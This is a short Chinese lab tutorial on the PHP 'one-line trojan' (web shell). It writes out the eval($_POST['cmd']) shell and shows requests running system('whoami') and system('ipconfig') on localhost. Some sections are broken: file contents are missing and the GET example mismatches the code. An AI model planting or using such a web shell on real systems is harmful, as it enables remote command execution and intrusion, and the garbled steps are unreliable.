一句话木马
一:具备网站环境
打开phpstudy,启动Apache和MySQL.
检查网站中网站域名为localhost的网站的状态,若过期,则到管理中点击修改,修改日期。确保该网站的正常运行。
添加附件HackBar:在火狐中打开应用程序菜单,点击扩展和主题,然后点击插件,进入新页面后找到右上角的小齿轮,点击从文件安装附加组件。找到hackbar文件所在路径,添加即可。注意关闭自动更新。
二:创建get.php文件并执行
文件内容为:
php
header(“Content-type:text/html;charset=gbk”);//中文声明代码
@eval($_POST[‘cmd’]);?>
函数eval — 把字符串作为PHP代码执行
注:函数eval()语言结构是 非常危险的,因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外别无方法, 请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据 。
在浏览器中应用:
输入:127.0.0.1/get.php?cmd=system(‘ipconfig’);
可以得到界面
二:创建post.php文件并执行
文件内容为:
在浏览器中应用:
输入:127.0.0.1/post.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作。
二:创建assert.php文件并执行
文件内容:
在浏览器中应用:
输入:127.0.0.1/assert.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作